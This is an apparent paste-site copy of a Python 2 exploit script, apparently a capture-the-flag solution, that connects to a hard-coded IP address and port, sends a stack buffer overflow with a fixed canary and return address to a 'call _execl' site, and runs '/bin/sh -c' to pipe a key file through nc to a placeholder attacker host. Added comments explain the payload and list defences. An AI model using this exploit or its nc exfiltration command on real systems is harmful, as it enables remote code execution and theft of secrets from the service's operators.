
angry.py

a guest Feb 23rd, 2014 313 Never
import socket
import struct
import sys

# Python 2 script: it relies on the print statement, str.decode('hex') and
# byte-valued str objects being sent on the socket.
#
# What the visible code does: it connects to a fixed TCP service, discards the
# greeting traffic, sends "4\n", and then sends one hand-built message that
# contains a hard-coded value named `canary`, a hard-coded stack address, an
# address the author labels "call _execl", and a small argument vector for
# /bin/sh.
#
# NOTE(review): every address and the canary are constants, so the script only
# works if the service presents the same values on each connection. That is
# consistent with a server that forks per connection without re-executing
# itself (children would inherit the parent's canary and memory layout), and
# with a binary loaded at a fixed address -- both inferred from the constants,
# not shown here. Defensive takeaways if so: bound the vulnerable read,
# re-exec per connection so the canary and ASLR are re-randomised, build the
# binary as PIE, and restrict what the service account may execute and where
# it may connect out to. The final command makes the service host spawn
# /bin/sh and open an outbound nc connection on port 5001, which process-exec
# monitoring and egress filtering would both surface.

HOST = '58.229.183.18'
PORT = 8888

RECV_SIZE = 4096


def p32(value):
    # Pack an integer as a 4-byte little-endian unsigned word.
    return struct.pack("<I", value)


# Open the TCP connection; the 4-second timeout is applied after connect(),
# so it only governs the reads and writes that follow.
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect((HOST, PORT))
conn.settimeout(4)

# Five reads whose data is thrown away -- presumably the banner and menu;
# this depends on how the server's output happens to be segmented.
for _ in range(5):
    conn.recv(RECV_SIZE)

# Send "4" plus newline (presumably a menu choice -- TODO confirm) and discard
# the reply.
conn.send("4\n")

conn.recv(RECV_SIZE)

# Base stack address derived from a previously observed value; how that value
# was obtained is not shown on this page.
stack_addr = 0xbfb0a7d8 - 0x28 + 0x10

# Hard-coded 4-byte value placed where the author expects the stack canary.
canary = p32(0x84c38b00)
stack_1 = p32(stack_addr)

# Eight raw bytes inserted unchanged between the stack address and `ret`;
# presumably the words that originally occupied those slots -- TODO confirm.
rest = "b3e863b7e8a7b0bf".decode('hex')

# 0x08048C79 is labelled by the author as the `call _execl` site.
ret = p32(0x08048C79)

# Pointers into the trailing string area. "/bin/sh\x00" is 8 bytes and
# "-c\x00" is 3, which is why the offsets step 0x14 -> 0x1c -> 0x1f.
payload_ptr = p32(stack_addr + 0x14)
payload2_ptr = p32(stack_addr + 0x1c)
payload3_ptr = p32(stack_addr + 0x1f)
arg2_ptr = p32(0x0804970a)

# Assemble the message: ten filler bytes, canary, stack address, the eight
# raw bytes, the return target, four pointers, a NULL word, then the three
# NUL-terminated strings. <your_ip_here> is the author's placeholder.
message = "".join([
    "yAAAAAAAAA",
    canary,
    stack_1,
    rest,
    ret,
    payload_ptr,
    arg2_ptr,
    payload2_ptr,
    payload3_ptr,
    "\x00\x00\x00\x00",
    "/bin/sh\x00-c\x00cat key | nc <your_ip_here> 5001\x00",
])
conn.send(message)

# Show whatever the service sends back (two reads, each bounded by the
# timeout set above).
print conn.recv(RECV_SIZE)
print conn.recv(RECV_SIZE)